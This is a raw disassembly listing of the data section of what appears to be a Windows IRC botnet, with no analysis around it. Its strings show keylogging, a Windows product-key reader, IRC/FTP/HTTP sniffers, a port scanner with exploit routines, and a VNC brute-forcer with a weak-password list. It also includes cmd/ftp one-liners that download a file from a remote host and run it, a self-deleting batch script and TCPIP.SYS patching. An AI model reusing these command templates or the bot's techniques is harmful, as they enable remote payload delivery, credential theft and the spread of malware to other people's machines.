aCdfghjkmpqrtvw db 'CDFGHJKMPQRTVWXY2346789',0
align 4
aDigitalproduct db 'DigitalProductId',0 ; DATA XREF: sub_407C63+3B�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion',0
; DATA XREF: sub_407C63+17�o
align 4
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_407D3E+BCD�o
align 4
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_407D3E+BC0�o
align 4
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_407D3E+BB3�o
align 4
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_407D3E+BA6�o
align 4
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_407D3E+B99�o
align 4
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_407D3E+B91�o
align 10h
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_407D3E:loc_4088BE�o
align 4
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_407D3E+B4F�o
align 4
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_407D3E+B47�o
align 4
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_407D3E:loc_408874�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_407D3E+AF5�o
align 10h
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_407D3E+AE8�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_407D3E+ADB�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_407D3E+AD3�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_407D3E:loc_408800�o
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_407D3E+A91�o
align 4
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_407D3E+A89�o
align 4
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_407D3E:loc_4087B6�o
align 4
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_407D3E+A47�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_407D3E+A3F�o
align 4
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_407D3E:loc_40876C�o
align 10h
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_407D3E+9B5�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_407D3E+9A8�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_407D3E+99B�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_407D3E+98E�o
align 10h
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_407D3E+981�o
align 4
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_407D3E+974�o
align 4
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_407D3E+967�o
align 10h
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_407D3E+95A�o
align 4
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_407D3E+94D�o
align 4
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_407D3E+940�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_407D3E+938�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_407D3E:loc_408661�o
align 4
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_407D3E+86C�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_407D3E+85F�o
align 4
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_407D3E+852�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_407D3E+845�o
align 4
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_407D3E+838�o
align 4
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_407D3E+82B�o
align 10h
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_407D3E+81E�o
align 4
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_407D3E+811�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_407D3E+804�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_407D3E+7FC�o
align 10h
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_407D3E:loc_408525�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_407D3E+6BD�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_407D3E+6B0�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_407D3E+6A3�o
align 4
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_407D3E+696�o
align 4
aGethostname db 'gethostname',0 ; DATA XREF: sub_407D3E+689�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_407D3E+67C�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_407D3E+66F�o
align 4
aAccept db 'accept',0 ; DATA XREF: sub_407D3E+662�o
align 10h
aListen db 'listen',0 ; DATA XREF: sub_407D3E+655�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_407D3E+648�o
align 10h
aBind db 'bind',0 ; DATA XREF: sub_407D3E+640�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_407D3E+62E�o
align 4
aRecv db 'recv',0 ; DATA XREF: sub_407D3E+621�o
align 4
aSendto db 'sendto',0 ; DATA XREF: sub_407D3E+614�o
align 4
aSend db 'send',0 ; DATA XREF: sub_407D3E+607�o
align 4
aNtohl db 'ntohl',0 ; DATA XREF: sub_407D3E+5FA�o
align 4
aNtohs db 'ntohs',0 ; DATA XREF: sub_407D3E+5ED�o
align 4
aHtonl db 'htonl',0 ; DATA XREF: sub_407D3E+5E0�o
align 4
aHtons db 'htons',0 ; DATA XREF: sub_407D3E+5D3�o
align 4
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_407D3E+5C6�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_407D3E+5B9�o
align 4
aConnect db 'connect',0 ; DATA XREF: sub_407D3E+5AC�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_407D3E+59F�o
aSocket db 'socket',0 ; DATA XREF: sub_407D3E+592�o
align 10h
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_407D3E+585�o
align 4
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_407D3E+578�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_407D3E+56B�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_407D3E+55E�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_407D3E+551�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_407D3E+544�o
align 4
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_407D3E+53C�o
align 10h
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_407D3E:loc_408265�o
align 4
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_407D3E+4BA�o
align 4
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_407D3E+4AD�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_407D3E+4A0�o
align 10h
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_407D3E+493�o
align 10h
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_407D3E+486�o
align 4
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_407D3E+479�o
align 4
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_407D3E+46C�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_407D3E+45F�o
align 4
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_407D3E+457�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_407D3E:loc_408184�o
align 4
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_407D3E:loc_40815C�o
align 4
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_407D3E+3C6�o
align 10h
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_407D3E+3B9�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_407D3E+3AC�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_407D3E+39F�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_407D3E+392�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_407D3E+385�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_407D3E+378�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_407D3E:loc_4080AE�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_407D3E+340�o
align 10h
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_407D3E+333�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_407D3E:loc_408069�o
align 4
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_407D3E+2E3�o
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_407D3E+2D6�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_407D3E+2C9�o
align 4
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_407D3E+2BC�o
align 4
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_407D3E+2AF�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_407D3E+2A7�o
align 4
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_407D3E:loc_407FD4�o
align 4
aGetuserprofile db 'GetUserProfileDirectoryA',0 ; DATA XREF: sub_407D3E+26E�o
align 4
aUserenv_dll db 'userenv.dll',0 ; DATA XREF: sub_407D3E:loc_407F9D�o
aGetforegroundw db 'GetForegroundWindow',0 ; DATA XREF: sub_407D3E+21A�o
aGetwindowtexta db 'GetWindowTextA',0 ; DATA XREF: sub_407D3E+20D�o
align 4
aGetkeystate db 'GetKeyState',0 ; DATA XREF: sub_407D3E+200�o
aGetasynckeysta db 'GetAsyncKeyState',0 ; DATA XREF: sub_407D3E:loc_407F36�o
align 4
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_407D3E+1A0�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_407D3E+193�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_407D3E+186�o
align 4
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_407D3E+179�o
align 4
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_407D3E+16C�o
align 4
aIswindow db 'IsWindow',0 ; DATA XREF: sub_407D3E+15F�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_407D3E+152�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_407D3E+14A�o
align 4
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_407D3E:loc_407E73�o
; sub_416BBC+13�o
align 10h
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_407D3E:loc_407E46�o
align 4
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_407D3E+A0�o
align 4
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_407D3E+93�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_407D3E+86�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_407D3E+79�o
align 4
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_407D3E+6C�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_407D3E+5F�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_407D3E+52�o
align 4
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_407D3E+45�o
align 4
aProcess32first db 'Process32First',0 ; DATA XREF: sub_407D3E+38�o
align 4
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_407D3E+2B�o
align 10h
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_407D3E+23�o
align 10h
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_407D3E+A�o
align 10h
dbl_41B1E0 dq -3.0517578125e-5 ; DATA XREF: sub_408964+1F�r
aMirc db 'mIRC',0 ; DATA XREF: sub_408995+7�o
; sub_40A091+95�o
align 10h
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_408B66+138�o
align 4
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_408B66+7D�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_408B66+40�o
align 4
a0: ; DATA XREF: sub_408D3F+E0�o
; sub_40BB9B+2CA�o
unicode 0, <0>,0
a90 db '90',0 ; DATA XREF: sub_408D3F:loc_408E0E�o
align 10h
a168 db '168',0 ; DATA XREF: sub_408D3F+BC�o
a192 db '192',0 ; DATA XREF: sub_408D3F:loc_408DEA�o
a16 db '16',0 ; DATA XREF: sub_408D3F+98�o
align 4
a172 db '172',0 ; DATA XREF: sub_408D3F:loc_408DC6�o
a10 db '10',0 ; DATA XREF: sub_408D3F+72�o
align 4
a2: ; DATA XREF: sub_408E61+2B�o
; .text:00409DB7�o
unicode 0, <2>,0
aSfc_os_dll db 'sfc_os.dll',0 ; DATA XREF: sub_408EA9+24�o
align 4
aTcpip_sysFixed db 'TCPIP.SYS fixed!, version %d.',0 ; DATA XREF: sub_408EF0+479�o
align 4
aCanNotOpenTcpi db 'Can not open TCPIP.SYS, version %d.',0 ; DATA XREF: sub_408EF0+13B�o
aRB db 'r+b',0 ; DATA XREF: sub_408EF0+11E�o
aG: ; DATA XREF: sub_408EF0+97�o
unicode 0, <G>,0
aS_7: ; DATA XREF: sub_408EF0+90�o
unicode 0, <>,0
asc_41B2D4: ; DATA XREF: sub_408EF0+86�o
unicode 0, <>,0
dword_41B2D8 dd 5 ; DATA XREF: sub_408EF0+79�o
dword_41B2DC dd 0FCh ; DATA XREF: sub_408EF0+72�o
dword_41B2E0 dd 43h ; DATA XREF: sub_408EF0+6B�o
dword_41B2E4 dd 6 ; DATA XREF: sub_408EF0+5E�o
dword_41B2E8 dd 16h ; DATA XREF: sub_408EF0+57�o
dword_41B2EC dd 4Ch ; DATA XREF: sub_408EF0+50�o
dword_41B2F0 dd 0C8h ; DATA XREF: sub_408EF0+48�o
dword_41B2F4 dd 3 ; DATA XREF: sub_408EF0+34�o
dword_41B2F8 dd 0E8h ; DATA XREF: sub_408EF0+2F�o
aWindowspatch32 db 'WINDOWSPATCH32.EXE',0 ; DATA XREF: .text:0041EE20�o
align 10h
aHijackthis_exe db 'HIJACKTHIS.EXE',0 ; DATA XREF: .text:off_41EE1C�o
align 10h
aSD db ' %s (%d)',0 ; DATA XREF: sub_409427+18D�o
align 4
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_409427+5A�o
; sub_409427+1ED�o
align 10h
aPsListFailed_ db 'Ps list failed.',0 ; DATA XREF: sub_409650:loc_4096CF�o
aPsListComplete db 'Ps list completed.',0 ; DATA XREF: sub_409650+78�o
align 4
aListingPs db 'Listing ps:',0 ; DATA XREF: sub_409650+2A�o
asc_41B370: ; DATA XREF: .text:00409AEA�o
unicode 0, <,>,0
aHttps db 'https:/',0 ; DATA XREF: .text:00409ACB�o
aHttp_0 db 'http:/',0 ; DATA XREF: .text:00409AB4�o
align 4
aString db ':String',0 ; DATA XREF: .text:00409A72�o
; .text:00409A89�o
aStringindex db 'StringIndex',0 ; DATA XREF: .text:00409A57�o
aE161255a db 'e161255a',0 ; DATA XREF: .text:loc_409A3A�o
align 4
aSSS_1 db '%s %s:%s',0 ; DATA XREF: .text:00409A05�o
; .text:00409B73�o
align 10h
a5e7e8100 db '5e7e8100',0 ; DATA XREF: .text:00409959�o
align 4
aWs db '%ws',0 ; DATA XREF: .text:004098B0�o
asc_41B3C0 db '%x',0 ; DATA XREF: .text:0040981F�o
align 4
aPstorecreatein db 'PStoreCreateInstance',0 ; DATA XREF: .text:004097AC�o
align 4
aPstorec_dll db 'pstorec.dll',0 ; DATA XREF: .text:00409795�o
aSI db '%s%i',0 ; DATA XREF: .text:00409EC8�o
align 10h
aSSSS db '%s|%s|%s|%s|',0 ; DATA XREF: .text:00409EA2�o
align 10h
a99 db '99',0 ; DATA XREF: .text:loc_409E64�o
align 4
a0D db '0%d',0 ; DATA XREF: .text:00409E3E�o
aDdDhDm db '%dd %dh %dm',0 ; DATA XREF: .text:00409E20�o
; sub_40A5BD+39�o
off_41B414 dd offset byte_4B4E55 ; DATA XREF: .text:00409E03�o
dword_41B418 dd 345053h ; DATA XREF: .text:00409DFC�o
dword_41B41C dd 34h ; DATA XREF: .text:00409DED�o
dword_41B420 dd 335053h ; DATA XREF: .text:00409DE3�o
dword_41B424 dd 33h ; DATA XREF: .text:00409DD2�o
dword_41B428 dd 325053h ; DATA XREF: .text:00409DC8�o
dword_41B42C dd 315053h ; DATA XREF: .text:00409DAD�o
dword_41B430 dd 31h ; DATA XREF: .text:00409D9C�o
dword_41B434 dd 305053h ; DATA XREF: .text:00409D92�o
dword_41B438 dd 4E55h ; DATA XREF: .text:loc_409D79�o
; sub_40A610:loc_40A759�o
dword_41B43C dd 3332h ; DATA XREF: .text:00409D72�o
; sub_40A610+142�o
dword_41B440 dd 5058h ; DATA XREF: .text:00409D67�o
; sub_40A610+137�o
dword_41B444 dd 4B32h ; DATA XREF: .text:00409D5A�o
; sub_40A610+12A�o
dword_41B448 dd 454Dh ; DATA XREF: .text:00409D47�o
; sub_40A610+118�o
dword_41B44C dd 3839h ; DATA XREF: .text:00409D3A�o
; sub_40A610+10B�o
dword_41B450 dd 544Eh ; DATA XREF: .text:00409D2E�o
; sub_40A610+FE�o
dword_41B454 dd 3539h ; DATA XREF: .text:00409D23�o
; sub_40A610+EE�o
aDoneWithIkbSec db 'Done with (%iKB/sec)',0 ; DATA XREF: sub_409FE8+48�o
align 10h
aKeylog db 'keylog',0 ; DATA XREF: sub_40A091+10B�o
align 4
aIrc db 'Irc',0 ; DATA XREF: sub_40A091+F6�o
aSetsMode db 'sets mode: ',0 ; DATA XREF: sub_40A091+E1�o
aJoin db 'JOIN # ',0 ; DATA XREF: sub_40A091+CC�o
aExploiting db 'exploiting',0 ; DATA XREF: sub_40A091+B7�o
align 4
aExploit db 'exploit',0 ; DATA XREF: sub_40A091+A6�o
aScanningThread db 'scanning threads.',0 ; DATA XREF: sub_40A091+84�o
align 4
a_l db '.l',0 ; DATA XREF: sub_40A091+73�o
align 4
a_login db '.login',0 ; DATA XREF: sub_40A091+62�o
align 4
a366 db '366 ',0 ; DATA XREF: sub_40A091+51�o
align 4
a302_0 db '302 ',0 ; DATA XREF: sub_40A091:loc_40A0D1�o
align 4
aJoin_0 db 'JOIN #',0 ; DATA XREF: sub_40A091+2B�o
align 4
aBotSniff db 'Bot sniff',0 ; DATA XREF: sub_40A091+5�o
align 4
aYouAreNowAnIrc db 'You are now an IRC Operator',0 ; DATA XREF: sub_40A1B0+62�o
aOper db 'oper ',0 ; DATA XREF: sub_40A1B0+51�o
align 4
aNick_1 db 'NICK ',0 ; DATA XREF: sub_40A1B0:loc_40A1F0�o
align 4
aOper_0 db 'OPER ',0 ; DATA XREF: sub_40A1B0+2B�o
align 4
aIrcSn db 'IRC sn',0 ; DATA XREF: sub_40A1B0+5�o
align 4
aFtpSn db 'FTP sn',0 ; DATA XREF: sub_40A226�o
align 4
aHttpSn db 'HTTP sn',0 ; DATA XREF: sub_40A24D�o
aVulnSniff db 'VULN sniff',0 ; DATA XREF: sub_40A274�o
align 10h
aSDToSDS db '"%s:%d" to "%s:%d": - "%s"',0Ah,0 ; DATA XREF: sub_40A29B:loc_40A3F6�o
aW00tWsaioctlFa db '-W00T- WSAIoctl() failed, returned %d',0 ; DATA XREF: sub_40A29B+10B�o
align 4
aW00tBindFailed db '-W00T- bind() failed, returned %d',0 ; DATA XREF: sub_40A29B+C7�o
align 4
dword_41B5A8 dd 53283403h, 45545359h, 464E494Dh, 320294Fh, 43503231h
; DATA XREF: sub_40A610+210�o
dd 4F464E49h, 303203Ah, 3A534F33h, 69572003h, 7325206Eh
dd 64252820h, 2C64252Eh, 69756220h, 2520646Ch, 202E2964h
dd 41523303h, 20033A4Dh, 424D6425h, 746F7420h, 202C6C61h
dd 424D6425h, 65726620h, 3202E65h, 54505533h, 3A454D49h
dd 64252003h, 64252064h, 64252068h, 3202E6Dh, 584F4233h
dd 2520033Ah, 3202E73h, 45535533h, 20033A52h, 202E7325h
dd 4E323103h, 4E495445h, 203A4F46h, 54330303h, 3A657079h
dd 73252003h, 73252820h, 3202E29h, 636F6C33h, 69206C61h
dd 20033A70h, 252E6425h, 64252E64h, 2E64252Eh, 43330320h
dd 656E6E6Fh, 64657463h, 6F726620h, 20033A6Dh, 2E7325h
dword_41B684 dd 28207325h, 297325h ; DATA XREF: sub_40A610+164�o
off_41B68C dd offset loc_412F4D+1 ; DATA XREF: sub_40A610+71�o
dword_41B690 dd 4E414Ch ; DATA XREF: sub_40A610:loc_40A678�o
dword_41B694 dd 6C616964h, 70752Dh ; DATA XREF: sub_40A610+58�o
dword_41B69C dd 202E6425h, 7325h ; DATA XREF: sub_40A8A6+44�o
dword_41B6A4 dd 7473694Ch, 72685420h, 73646165h, 0 ; DATA XREF: sub_40A8A6+E�o
aSNoSThreadFoun db '%s: No %s thread found.',0 ; DATA XREF: sub_40AA51+51�o
aSSStopped_DThr db '%s: %s stopped. (%d thread(s) stopped.)',0 ; DATA XREF: sub_40AA51+35�o
aIpSPortDIs0p3n db 'IP %s, Port %d is 0p3n.',0 ; DATA XREF: sub_40AD8F+DC�o
aIpSDScanTDSubT db 'IP: %s:%d, Scan|t: %d, Sub|thread: %d.',0 ; DATA XREF: sub_40AD8F+84�o
align 4
aFinishedAtSDAf db 'Finished at %s:%d after %d minute(s) of scanning.',0
; DATA XREF: sub_40AFA2+1BC�o
align 4
aFailedToStarTh db 'Failed to star thr34d, error: <%d>.',0 ; DATA XREF: sub_40AFA2+144�o
aSDScann3rThrea db '%s:%d, Scann3r thread: %d, Sub|thread: %d.',0
; DATA XREF: sub_40AFA2+DF�o
align 4
aFailedToInitia db 'Failed to initialize critical section.',0 ; DATA XREF: sub_40AFA2+69�o
align 10h
aEchoOpenSDOEch db 'echo open %s %d > o&echo user %s %s >> o &echo get %s >> o &echo '
; DATA XREF: sub_40B1D5+A4�o
db 'quit >> o &ftp -n -s:o &del /F /Q o &%s',0Dh,0Ah,0
align 4
loc_41B84C: ; DATA XREF: sub_40B31C+17A�o
jmp short loc_41B854
; ---------------------------------------------------------------------------
jmp short loc_41B856
; ---------------------------------------------------------------------------
dd 0
; ---------------------------------------------------------------------------
loc_41B854: ; CODE XREF: .text:loc_41B84C�j
; DATA XREF: sub_40B31C+27�o
pop esp
pop esp
loc_41B856: ; CODE XREF: .text:0041B84E�j
and eax, 70695C73h
arpl [eax+eax], sp
; ---------------------------------------------------------------------------
dw 0
dword_41B860 dd 1CEC8166h ; DATA XREF: sub_40B31C+D�r
dword_41B864 dd 0E4FF07h ; DATA XREF: sub_40B31C+16�r
aTryingSS db 'Trying: %s (%s)',0 ; DATA XREF: .text:0040B8DC�o
asc_41B878: ; DATA XREF: sub_40BB9B+320�o
unicode 0, <`>,0
dword_41B87C dd 62B0606h, 2050501h, 0A0h ; DATA XREF: sub_40BB9B+2F5�o
dword_41B888 dd 0A1h ; DATA XREF: sub_40BB9B+29F�o
dword_41B88C dd 3 ; DATA XREF: sub_40BB9B+246�o
aCccc db 'CCCC',0 ; DATA XREF: sub_40BB9B+153�o
align 4
loc_41B898: ; DATA XREF: sub_40BB9B+E8�o
jmp short near ptr dword_41B8A0
; ---------------------------------------------------------------------------
align 10h
dword_41B8A0 dd 2 dup(0) ; CODE XREF: .text:loc_41B898�j
dbl_41B8A8 dq 1.388888888888889e-2 ; DATA XREF: sub_40C0E1+3A�r
dbl_41B8B0 dq 1.666666666666667e-1 ; DATA XREF: sub_40C0E1:loc_40C0FC�r
dbl_41B8B8 dq 1.333333333333333 ; DATA XREF: sub_40C62F:loc_40C6AC�r
aGetHttp1_0Host db 'GET / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_40C7B0+60�o
db 'Host: %s',0Dh,0Ah
db 'Authorization: Negotiate %s',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aSS_ db '%s// %s.',0 ; DATA XREF: sub_40C878+1A4�o
align 4
aCmdKEchoOpenSD db 'cmd /k echo open %s %d > o&echo user %s %s >> o &echo get %s >> o'
; DATA XREF: sub_40C878+5D�o
; .text:0040CFEE�o
db ' &echo quit >> o &ftp -n -s:o &del /F /Q o &%s',0Dh,0Ah,0
align 10h
aCmdCEchoOpenSD db 'cmd /c echo open %s %d >> ii &echo user %s %s >> ii &echo get %s '
; DATA XREF: sub_40CA59+A4�o
db '>> ii &echo bye >> ii &ftp -n -v -s:ii &del ii &%s',0Dh,0Ah,0
align 4
aAbc123 db 'abc123',0 ; DATA XREF: .text:00420F68�o
align 10h
aPass db 'pass',0 ; DATA XREF: .text:00420F64�o
align 4
aAdmin db 'admin',0 ; DATA XREF: .text:00420F60�o
align 10h
aServer_1 db 'server',0 ; DATA XREF: .text:00420F5C�o
align 4
aFtp db 'ftp',0 ; DATA XREF: .text:00420F58�o
aPassword_0 db 'password',0 ; DATA XREF: .text:00420F54�o
align 4
aVnc db 'vnc',0 ; DATA XREF: .text:00420F50�o
aCam db 'cam',0 ; DATA XREF: .text:00420F4C�o
aTest db 'test',0 ; DATA XREF: .text:00420F48�o
align 4
aAbc db 'abc',0 ; DATA XREF: .text:00420F44�o
a123456 db '123456',0 ; DATA XREF: .text:00420F40�o
align 4
a12345 db '12345',0 ; DATA XREF: .text:00420F3C�o
align 4
a1234 db '1234',0 ; DATA XREF: .text:00420F38�o
align 4
a123 db '123',0 ; DATA XREF: .text:off_420F34�o
aSystemrootSyst db '%systemroot%\system32\cmd.exe',0 ; DATA XREF: sub_40CDF0+A�o
align 4
aV_n_cD_DSSNo__ db 'V.N.C%d.%d %s: %s - No..Pass',0 ; DATA XREF: .text:0040D5B3�o
align 4
aV_n_cD_DSSS db 'V.N.C%d.%d %s: %s - %s',0 ; DATA XREF: .text:0040D4B5�o
align 10h
aV_n_cD_DSSFree db 'V.N.C%d.%d %s: %s - FREE',0 ; DATA XREF: .text:0040D3DE�o
align 4
aRfb03d_03d db 'RFB %03d.%03d',0Ah,0 ; DATA XREF: .text:0040D08E�o
; .text:0040D0C8�o ...
align 4
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: sub_40DD0D+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: sub_40DD0D�o
align 10h
oword_41BB00 xmmword 3FF00000000000003FF0000000000000h ; DATA XREF: sub_40F5A0+E3�r
oword_41BB10 xmmword 4330000000000000433h ; DATA XREF: sub_40F5A0+46�r
oword_41BB20 xmmword 4330000000000000BFF0000000000000h ; DATA XREF: sub_40F5A0+10E�r
oword_41BB30 xmmword 80000000000000008000000000000000h
; DATA XREF: sub_40F5A0:loc_40F69D�r
; sub_40F5A0+106�r
oword_41BB40 xmmword 7FFh ; DATA XREF: sub_40F5A0+5F�r
dword_41BB50 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: sub_40F6D4+E�o
dd 3, 19930520h, 2 dup(0)
oword_41BB70 xmmword 3FF00000000000003FF0000000000000h ; DATA XREF: sub_40F710+E3�r
; sub_40F710+10A�r
oword_41BB80 xmmword 4330000000000000433h ; DATA XREF: sub_40F710+46�r
oword_41BB90 xmmword 0 ; DATA XREF: sub_40F710:loc_40F811�r
oword_41BBA0 xmmword 7FFh ; DATA XREF: sub_40F710+5F�r
dbl_41BBB0 db 0, 0, 0, 0, 0, 0, 0, 80h ; DATA XREF: sub_40F710:loc_40F80A�r
stru_41BBB8 _msEH <0FFFFFFFFh, offset loc_40F9F1, offset loc_40FA05>
; DATA XREF: .text:0040F854�o
align 8
byte_41BBC8 db 6 ; DATA XREF: sub_40FBCF:loc_40FC30�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
aNull: ; DATA XREF: .text:off_42125C�o
unicode 0, <(null)>,0
align 4
aNull_0 db '(null)',0 ; DATA XREF: .text:off_421258�o
align 10h
stru_41BC40 _msEH <0FFFFFFFFh, offset loc_410EB6, offset loc_410EBA>
; DATA XREF: sub_41095C+5�o
align 10h
stru_41BC50 _msEH <0FFFFFFFFh, offset loc_4115DF, offset loc_4115E3>
; DATA XREF: sub_4115B2+2�o
align 10h
stru_41BC60 _msEH <0FFFFFFFFh, offset loc_411623, offset loc_411627>
; DATA XREF: .text:004115F8�o
align 10h
stru_41BC70 _msEH <0FFFFFFFFh, offset sub_411B91, offset loc_411B95>
; DATA XREF: sub_411BA5-2F�o
align 10h
